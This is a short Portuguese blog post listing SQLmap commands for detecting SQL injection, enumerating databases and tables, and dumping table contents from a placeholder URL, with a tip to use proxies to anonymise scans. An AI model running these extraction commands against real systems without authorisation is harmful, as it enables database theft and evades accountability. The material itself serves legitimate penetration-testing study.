Principais Comandos do SQLmap para Testes de Injeção SQL

SQLmap é uma ferramenta automatizada para detectar e explorar falhas de injeção SQL. Aqui estão alguns comandos essenciais.

Detecção Básica:

  • sqlmap -u "http://target.com/vulnerable.php?id=1" - Varredura básica em um URL vulnerável.

Enumeração de Bancos de Dados:

  • sqlmap -u "http://target.com/vulnerable.php?id=1" --dbs - Lista todos os bancos de dados disponíveis.

Enumeração de Tabelas:

  • sqlmap -u "http://target.com/vulnerable.php?id=1" -D database_name --tables - Lista todas as tabelas de um banco de dados específico.

Dump de Dados:

  • sqlmap -u "http://target.com/vulnerable.php?id=1" -D database_name -T table_name --dump - Extrai os dados de uma tabela específica.

Dicas e Truques:

  • Sempre verifique as permissões antes de executar comandos destrutivos.
  • Use proxies para anonimizar suas varreduras.

Conclusão: SQLmap é uma ferramenta poderosa para testes de injeção SQL. Use esses comandos para identificar e explorar vulnerabilidades em bancos de dados. Para mais informações, consulte a documentação oficial.

Postar um comentário

Postagem Anterior Próxima Postagem

Seguidores